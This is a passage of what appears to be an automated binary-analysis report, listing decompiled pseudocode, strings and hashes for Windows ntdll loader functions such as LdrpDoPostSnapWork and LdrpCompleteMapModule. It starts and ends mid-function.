                                                      									_t280 =  &(_t280[0]);
                                                      								}
                                                      								_t243 = _t278;
                                                      								_t277 = E017F1370(_t278, 0x1784e90);
                                                      								_pop(_t257);
                                                      							} while (_t277 != 0);
                                                      							_v48 = _t243;
                                                      							_t242 = _v52;
                                                      							goto L38;
                                                      						}
                                                      					}
                                                      					_t191 = _v12;
                                                      					_t260 = _v12 + 4;
                                                      					_v28 = _t260;
                                                      					if(_t260 == 0) {
                                                      						_t275 = _t280;
                                                      						_v16 = _t280;
                                                      					} else {
                                                      						_t275 = L017C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                      						_t191 = _v12;
                                                      						_v16 = _t275;
                                                      					}
                                                      					if(_t275 == 0) {
                                                      						_v28 = _t280;
                                                      						_t280 = 0xc0000017;
                                                      						goto L47;
                                                      					} else {
                                                      						E017EF3E0(_t275, _v8, _t191);
                                                      						_t285 = _t285 + 0xc;
                                                      						_v48 = _t275;
                                                      						_t279 = _t280;
                                                      						_t281 = E017F1370(_v16, 0x1784e90);
                                                      						_pop(_t262);
                                                      						if(_t281 != 0) {
                                                      							_t244 = _v48;
                                                      							do {
                                                      								 *_t281 = 0;
                                                      								_t282 = _t281 + 2;
                                                      								E017EBB40(_t262,  &_v68, _t244);
                                                      								if(L017B43C0( &_v68,  &_v24) != 0) {
                                                      									_t279 =  &(_t279[0]);
                                                      								}
                                                      								_t244 = _t282;
                                                      								_t281 = E017F1370(_t282, 0x1784e90);
                                                      								_pop(_t262);
                                                      							} while (_t281 != 0);
                                                      							_v48 = _t244;
                                                      							_t242 = _v52;
                                                      						}
                                                      						_t201 = _v48;
                                                      						_t280 = 0;
                                                      						if( *_v48 != 0) {
                                                      							E017EBB40(_t262,  &_v68, _t201);
                                                      							if(L017B43C0( &_v68,  &_v24) != 0) {
                                                      								_t279 =  &(_t279[0]);
                                                      							}
                                                      						}
                                                      						if(_t279 == 0) {
                                                      							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                      							_v28 = _t280;
                                                      							_v16 = _t280;
                                                      						}
                                                      						_t202 = _v8;
                                                      						if(_v8 != 0) {
                                                      							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                      						}
                                                      						_v8 = _t280;
                                                      						goto L28;
                                                      					}
                                                      				}
                                                      				_t214 = _v12;
                                                      				_t264 = _v12 + 4;
                                                      				_v40 = _t264;
                                                      				if(_t264 == 0) {
                                                      					_v20 = _t280;
                                                      				} else {
                                                      					_t236 = L017C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                      					_t280 = _t236;
                                                      					_v20 = _t236;
                                                      					_t214 = _v12;
                                                      				}
                                                      				if(_t280 == 0) {
                                                      					_t161 = 0;
                                                      					_t280 = 0xc0000017;
                                                      					_v40 = 0;
                                                      					goto L48;
                                                      				} else {
                                                      					E017EF3E0(_t280, _v8, _t214);
                                                      					_t285 = _t285 + 0xc;
                                                      					_v48 = _t280;
                                                      					_t283 = E017F1370(_t280, 0x1784e90);
                                                      					_pop(_t267);
                                                      					if(_t283 != 0) {
                                                      						_t245 = _v48;
                                                      						do {
                                                      							 *_t283 = 0;
                                                      							_t284 = _t283 + 2;
                                                      							E017EBB40(_t267,  &_v68, _t245);
                                                      							if(L017B43C0( &_v68,  &_v24) != 0) {
                                                      								_t275 = _t275 + 1;
                                                      							}
                                                      							_t245 = _t284;
                                                      							_t283 = E017F1370(_t284, 0x1784e90);
                                                      							_pop(_t267);
                                                      						} while (_t283 != 0);
                                                      						_v48 = _t245;
                                                      						_t242 = _v52;
                                                      					}
                                                      					_t224 = _v48;
                                                      					_t280 = 0;
                                                      					if( *_v48 != 0) {
                                                      						E017EBB40(_t267,  &_v68, _t224);
                                                      						if(L017B43C0( &_v68,  &_v24) != 0) {
                                                      							_t275 = _t275 + 1;
                                                      						}
                                                      					}
                                                      					if(_t275 == 0) {
                                                      						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                      						_v40 = _t280;
                                                      						_v20 = _t280;
                                                      					}
                                                      					_t225 = _v8;
                                                      					if(_v8 != 0) {
                                                      						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                      					}
                                                      					_v8 = _t280;
                                                      					goto L16;
                                                      				}
                                                      			}


                                                      Strings
                                                      • Kernel-MUI-Language-SKU, xrefs: 017B3F70
                                                      • WindowsExcludedProcs, xrefs: 017B3D6F
                                                      • Kernel-MUI-Language-Allowed, xrefs: 017B3DC0
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 017B3E97
                                                      • Kernel-MUI-Number-Allowed, xrefs: 017B3D8C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                      • Instruction ID: 3b92f503e57748ffa12f842f2f7dcd8e3ab7dcacc42253aa20eb634e721e3525
                                                      • Opcode Fuzzy Hash: d2229998ed12e387aa03605d179ac6ec319a3bd48697ec5cd0c67e83d60e1a55
                                                      • Instruction Fuzzy Hash: 86F12772D00219EBCB12DF98C984AEEFBB9FF59750F15006AE506E7251E7749A40CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E017D8E00(void* __ecx) {
                                                      				signed int _v8;
                                                      				char _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr* _t32;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t43;
                                                      				void* _t46;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      				signed int _t49;
                                                      				void* _t50;
                                                      				intOrPtr* _t51;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				intOrPtr _t55;
                                                      
                                                      				_v8 =  *0x189d360 ^ _t52;
                                                      				_t49 = 0;
                                                      				_t48 = __ecx;
                                                      				_t55 =  *0x1898464; // 0x74790110
                                                      				if(_t55 == 0) {
                                                      					L9:
                                                      					if( !_t49 >= 0) {
                                                      						if(( *0x1895780 & 0x00000003) != 0) {
                                                      							E01825510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                      						}
                                                      						if(( *0x1895780 & 0x00000010) != 0) {
                                                      							asm("int3");
                                                      						}
                                                      					}
                                                      					return E017EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                      				}
                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                      				_t43 =  *0x1897984; // 0x14e2bb8
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                      					if(_t48 == _t43) {
                                                      						_t50 = 0x5c;
                                                      						if( *_t32 == _t50) {
                                                      							_t46 = 0x3f;
                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                      								_t32 = _t32 + 8;
                                                      							}
                                                      						}
                                                      					}
                                                      					_t51 =  *0x1898464; // 0x74790110
                                                      					 *0x189b1e0(_t47, _t32,  &_v12);
                                                      					_t49 =  *_t51();
                                                      					if(_t49 >= 0) {
                                                      						L8:
                                                      						_t35 = _v12;
                                                      						if(_t35 != 0) {
                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                      								E017D9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                      								_t35 = _v12;
                                                      							}
                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      					if(_t49 != 0xc000008a) {
                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                      							if(_t49 != 0xc00000bb) {
                                                      								goto L8;
                                                      							}
                                                      						}
                                                      					}
                                                      					if(( *0x1895780 & 0x00000005) != 0) {
                                                      						_push(_t49);
                                                      						E01825510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                      						_t53 = _t53 + 0x1c;
                                                      					}
                                                      					_t49 = 0;
                                                      					goto L8;
                                                      				} else {
                                                      					goto L9;
                                                      				}
                                                      			}


                                                      Strings
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01819357
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0181932A
                                                      • LdrpFindDllActivationContext, xrefs: 01819331, 0181935D
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0181933B, 01819367
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                      • Instruction ID: d7a02f92a7c4ed64a13030f36747a8d40bb3e1b05906b47a598ed36abd608f1a
                                                      • Opcode Fuzzy Hash: b4a3f68506b216ce7627fe94036e54d2160b8960c5379eb7b94d649ad0e13656
                                                      • Instruction Fuzzy Hash: 47412C72A4031DAFDB366A1CCC99A79F7B4BB09718F094569E50497151E7709E808FC3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E017B8794(void* __ecx) {
                                                      				signed int _v0;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				intOrPtr _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v40;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr* _t77;
                                                      				signed int _t80;
                                                      				signed char _t81;
                                                      				signed int _t87;
                                                      				signed int _t91;
                                                      				void* _t92;
                                                      				void* _t94;
                                                      				signed int _t95;
                                                      				signed int _t103;
                                                      				signed int _t105;
                                                      				signed int _t110;
                                                      				signed int _t118;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr _t122;
                                                      				signed int _t125;
                                                      				signed int _t129;
                                                      				signed int _t131;
                                                      				signed int _t134;
                                                      				signed int _t136;
                                                      				signed int _t143;
                                                      				signed int* _t147;
                                                      				signed int _t151;
                                                      				void* _t153;
                                                      				signed int* _t157;
                                                      				signed int _t159;
                                                      				signed int _t161;
                                                      				signed int _t166;
                                                      				signed int _t168;
                                                      
                                                      				_push(__ecx);
                                                      				_t153 = __ecx;
                                                      				_t159 = 0;
                                                      				_t121 = __ecx + 0x3c;
                                                      				if( *_t121 == 0) {
                                                      					L2:
                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                      							L6:
                                                      							if(E017B934A() != 0) {
                                                      								_t159 = E0182A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                      								__eflags = _t159;
                                                      								if(_t159 < 0) {
                                                      									_t81 =  *0x1895780; // 0x0
                                                      									__eflags = _t81 & 0x00000003;
                                                      									if((_t81 & 0x00000003) != 0) {
                                                      										_push(_t159);
                                                      										E01825510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                      										_t81 =  *0x1895780; // 0x0
                                                      									}
                                                      									__eflags = _t81 & 0x00000010;
                                                      									if((_t81 & 0x00000010) != 0) {
                                                      										asm("int3");
                                                      									}
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t159 = E017B849B(0, _t122, _t153, _t159, _t180);
                                                      							if(_t159 >= 0) {
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      						_t80 = _t159;
                                                      						goto L8;
                                                      					} else {
                                                      						_t125 = 0x13;
                                                      						asm("int 0x29");
                                                      						_push(0);
                                                      						_push(_t159);
                                                      						_t161 = _t125;
                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                      						_t143 = 0;
                                                      						_v40 = _t161;
                                                      						_t118 = 0;
                                                      						_push(_t153);
                                                      						__eflags = _t87;
                                                      						if(_t87 != 0) {
                                                      							_t118 = _t87 + 0x5d8;
                                                      							__eflags = _t118;
                                                      							if(_t118 == 0) {
                                                      								L46:
                                                      								_t118 = 0;
                                                      							} else {
                                                      								__eflags =  *(_t118 + 0x30);
                                                      								if( *(_t118 + 0x30) == 0) {
                                                      									goto L46;
                                                      								}
                                                      							}
                                                      						}
                                                      						_v32 = 0;
                                                      						_v28 = 0;
                                                      						_v16 = 0;
                                                      						_v20 = 0;
                                                      						_v12 = 0;
                                                      						__eflags = _t118;
                                                      						if(_t118 != 0) {
                                                      							__eflags = _t161;
                                                      							if(_t161 != 0) {
                                                      								__eflags =  *(_t118 + 8);
                                                      								if( *(_t118 + 8) == 0) {
                                                      									L22:
                                                      									_t143 = 1;
                                                      									__eflags = 1;
                                                      								} else {
                                                      									_t19 = _t118 + 0x40; // 0x40
                                                      									_t156 = _t19;
                                                      									E017B8999(_t19,  &_v16);
                                                      									__eflags = _v0;
                                                      									if(_v0 != 0) {
                                                      										__eflags = _v0 - 1;
                                                      										if(_v0 != 1) {
                                                      											goto L22;
                                                      										} else {
                                                      											_t128 =  *(_t161 + 0x64);
                                                      											__eflags =  *(_t161 + 0x64);
                                                      											if( *(_t161 + 0x64) == 0) {
                                                      												goto L22;
                                                      											} else {
                                                      												E017B8999(_t128,  &_v12);
                                                      												_t147 = _v12;
                                                      												_t91 = 0;
                                                      												__eflags = 0;
                                                      												_t129 =  *_t147;
                                                      												while(1) {
                                                      													__eflags =  *((intOrPtr*)(0x1895c60 + _t91 * 8)) - _t129;
                                                      													if( *((intOrPtr*)(0x1895c60 + _t91 * 8)) == _t129) {
                                                      														break;
                                                      													}
                                                      													_t91 = _t91 + 1;
                                                      													__eflags = _t91 - 5;
                                                      													if(_t91 < 5) {
                                                      														continue;
                                                      													} else {
                                                      														_t131 = 0;
                                                      														__eflags = 0;
                                                      													}
                                                      													L37:
                                                      													__eflags = _t131;
                                                      													if(_t131 != 0) {
                                                      														goto L22;
                                                      													} else {
                                                      														__eflags = _v16 - _t147;
                                                      														if(_v16 != _t147) {
                                                      															goto L22;
                                                      														} else {
                                                      															E017C2280(_t92, 0x18986cc);
                                                      															_t94 = E01879DFB( &_v20);
                                                      															__eflags = _t94 - 1;
                                                      															if(_t94 != 1) {
                                                      															}
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															 *_t118 =  *_t118 + 1;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															_t95 = E017D61A0( &_v32);
                                                      															__eflags = _t95;
                                                      															if(_t95 != 0) {
                                                      																__eflags = _v32 | _v28;
                                                      																if((_v32 | _v28) != 0) {
                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                      																	_t134 = _t71;
                                                      																	goto L55;
                                                      																}
                                                      															}
                                                      															goto L30;
                                                      														}
                                                      													}
                                                      													goto L56;
                                                      												}
                                                      												_t92 = 0x1895c64 + _t91 * 8;
                                                      												asm("lock xadd [eax], ecx");
                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                      												goto L37;
                                                      											}
                                                      										}
                                                      										goto L56;
                                                      									} else {
                                                      										_t143 = E017B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                      										__eflags = _t143;
                                                      										if(_t143 != 0) {
                                                      											_t157 = _v12;
                                                      											_t103 = 0;
                                                      											__eflags = 0;
                                                      											_t136 =  &(_t157[1]);
                                                      											 *(_t161 + 0x64) = _t136;
                                                      											_t151 =  *_t157;
                                                      											_v20 = _t136;
                                                      											while(1) {
                                                      												__eflags =  *((intOrPtr*)(0x1895c60 + _t103 * 8)) - _t151;
                                                      												if( *((intOrPtr*)(0x1895c60 + _t103 * 8)) == _t151) {
                                                      													break;
                                                      												}
                                                      												_t103 = _t103 + 1;
                                                      												__eflags = _t103 - 5;
                                                      												if(_t103 < 5) {
                                                      													continue;
                                                      												}
                                                      												L21:
                                                      												_t105 = E017EF380(_t136, 0x1781184, 0x10);
                                                      												__eflags = _t105;
                                                      												if(_t105 != 0) {
                                                      													__eflags =  *_t157 -  *_v16;
                                                      													if( *_t157 >=  *_v16) {
                                                      														goto L22;
                                                      													} else {
                                                      														asm("cdq");
                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                      														asm("cdq");
                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                      														if(__eflags > 0) {
                                                      															L29:
                                                      															E017C2280(_t108, 0x18986cc);
                                                      															 *_t118 =  *_t118 + 1;
                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                      															_t156 = _t42;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															_t110 = E017D61A0( &_v32);
                                                      															__eflags = _t110;
                                                      															if(_t110 != 0) {
                                                      																__eflags = _v32 | _v28;
                                                      																if((_v32 | _v28) != 0) {
                                                      																	_t134 = _v20;
                                                      																	L55:
                                                      																	E01879D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                      																}
                                                      															}
                                                      															L30:
                                                      															 *_t118 =  *_t118 + 1;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															E017BFFB0(_t118, _t156, 0x18986cc);
                                                      															goto L22;
                                                      														} else {
                                                      															if(__eflags < 0) {
                                                      																goto L22;
                                                      															} else {
                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                      																	goto L22;
                                                      																} else {
                                                      																	goto L29;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													goto L56;
                                                      												}
                                                      												goto L22;
                                                      											}
                                                      											asm("lock inc dword [eax]");
                                                      											goto L21;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						return _t143;
                                                      					}
                                                      				} else {
                                                      					_push( &_v8);
                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                      					_push(__ecx + 0x40);
                                                      					_push(_t121);
                                                      					_push(0xffffffff);
                                                      					_t80 = E017E9A00();
                                                      					_t159 = _t80;
                                                      					if(_t159 < 0) {
                                                      						L8:
                                                      						return _t80;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				L56:
                                                      			}












































                                                      0x017b88a8
                                                      0x017b88b0
                                                      0x017b88b2
                                                      0x017b88d3
                                                      0x017b88d5
                                                      0x00000000
                                                      0x017b88d7
                                                      0x017b88db
                                                      0x017b88dc
                                                      0x017b88e0
                                                      0x017b88e8
                                                      0x017b88ee
                                                      0x017b88f0
                                                      0x017b88f3
                                                      0x017b88fc
                                                      0x017b8901
                                                      0x017b8906
                                                      0x017b890c
                                                      0x017b890c
                                                      0x017b890f
                                                      0x017b8916
                                                      0x017b8917
                                                      0x017b8918
                                                      0x017b8919
                                                      0x017b891a
                                                      0x017b891f
                                                      0x017b8921
                                                      0x01809c52
                                                      0x01809c55
                                                      0x01809c5b
                                                      0x01809cac
                                                      0x01809cc0
                                                      0x01809cc0
                                                      0x01809c55
                                                      0x017b8927
                                                      0x017b8927
                                                      0x017b892f
                                                      0x017b8933
                                                      0x00000000
                                                      0x017b88f5
                                                      0x017b88f5
                                                      0x00000000
                                                      0x017b88f7
                                                      0x017b88f7
                                                      0x017b88fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017b88fa
                                                      0x017b88f5
                                                      0x017b88f3
                                                      0x00000000
                                                      0x017b88d5
                                                      0x00000000
                                                      0x017b88b2
                                                      0x017b88c9
                                                      0x00000000
                                                      0x017b88c9
                                                      0x017b887f
                                                      0x017b886a
                                                      0x017b8857
                                                      0x017b8852
                                                      0x017b88bf
                                                      0x017b88bf
                                                      0x017b87aa
                                                      0x017b87ad
                                                      0x017b87ae
                                                      0x017b87b4
                                                      0x017b87b5
                                                      0x017b87b6
                                                      0x017b87b8
                                                      0x017b87bd
                                                      0x017b87c1
                                                      0x017b87f4
                                                      0x017b87fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017b87c1
                                                      0x00000000

                                                      Strings
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01809C18
                                                      • LdrpDoPostSnapWork, xrefs: 01809C1E
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01809C28
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 2994545307-1948996284
                                                      • Opcode ID: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                      • Instruction ID: 970064ee97e3d540748acea143643db175bdbcda45880d071822ab351c6f27b9
                                                      • Opcode Fuzzy Hash: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                      • Instruction Fuzzy Hash: E991E271A1021ADBDF19DF59D8C0AEAF7B9FF44318B054169EA05AB245DB30EA01CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E017B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				char _v24;
                                                      				signed int _t73;
                                                      				void* _t77;
                                                      				char* _t82;
                                                      				char* _t87;
                                                      				signed char* _t97;
                                                      				signed char _t102;
                                                      				intOrPtr _t107;
                                                      				signed char* _t108;
                                                      				intOrPtr _t112;
                                                      				intOrPtr _t124;
                                                      				intOrPtr _t125;
                                                      				intOrPtr _t126;
                                                      
                                                      				_t107 = __edx;
                                                      				_v12 = __ecx;
                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                      				_t124 = 0;
                                                      				_v20 = __edx;
                                                      				if(E017BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                      					_t112 = _v8;
                                                      				} else {
                                                      					_t112 = 0;
                                                      					_v8 = 0;
                                                      				}
                                                      				if(_t112 != 0) {
                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                      						_t124 = 0xc000007b;
                                                      						goto L8;
                                                      					}
                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                      					 *(_t125 + 0x34) = _t73;
                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                      						goto L3;
                                                      					}
                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                      					_t124 = E017AC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                      					if(_t124 < 0) {
                                                      						goto L8;
                                                      					} else {
                                                      						goto L3;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                      						L8:
                                                      						return _t124;
                                                      					}
                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                      							goto L5;
                                                      						}
                                                      						_t102 =  *0x1895780; // 0x0
                                                      						if((_t102 & 0x00000003) != 0) {
                                                      							E01825510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                      							_t102 =  *0x1895780; // 0x0
                                                      						}
                                                      						if((_t102 & 0x00000010) != 0) {
                                                      							asm("int3");
                                                      						}
                                                      						_t124 = 0xc0000428;
                                                      						goto L8;
                                                      					}
                                                      					L5:
                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                      						goto L8;
                                                      					}
                                                      					_t77 = _a4 - 0x40000003;
                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                      						if(E017C7D50() != 0) {
                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      						} else {
                                                      							_t82 = 0x7ffe0384;
                                                      						}
                                                      						_t108 = 0x7ffe0385;
                                                      						if( *_t82 != 0) {
                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                      								if(E017C7D50() == 0) {
                                                      									_t97 = 0x7ffe0385;
                                                      								} else {
                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      								}
                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                      									E01827016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                      								}
                                                      							}
                                                      						}
                                                      						if(_a4 != 0x40000003) {
                                                      							L14:
                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                      							if(E017C7D50() != 0) {
                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      							} else {
                                                      								_t87 = 0x7ffe0384;
                                                      							}
                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                      								if(E017C7D50() != 0) {
                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      								}
                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                      									E01827016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                      								}
                                                      							}
                                                      							goto L8;
                                                      						} else {
                                                      							_v16 = _t125 + 0x24;
                                                      							_t124 = E017DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                      							if(_t124 < 0) {
                                                      								E017AB1E1(_t124, 0x1490, 0, _v16);
                                                      								goto L8;
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      					} else {
                                                      						goto L8;
                                                      					}
                                                      				}
                                                      			}


                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01809891
                                                      • LdrpCompleteMapModule, xrefs: 01809898
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 018098A2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                      • Instruction ID: aee34e6c0e18deeae0fdf883fcad0d23d3041c7da1464c4abf79c4037decf711
                                                      • Opcode Fuzzy Hash: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                      • Instruction Fuzzy Hash: 2251F531A00745DBE72ACB5CC9C4BA9FBA4AF88714F040699E955DB7D2D734EE00C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E017AE620(void* __ecx, short* __edx, short* _a4) {
                                                      				char _v16;
                                                      				char _v20;
                                                      				intOrPtr _v24;
                                                      				char* _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v44;
                                                      				signed int _v48;
                                                      				intOrPtr _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				char _v64;
                                                      				void* _v68;
                                                      				void* _v76;
                                                      				void* _v84;
                                                      				signed int _t59;
                                                      				signed int _t74;
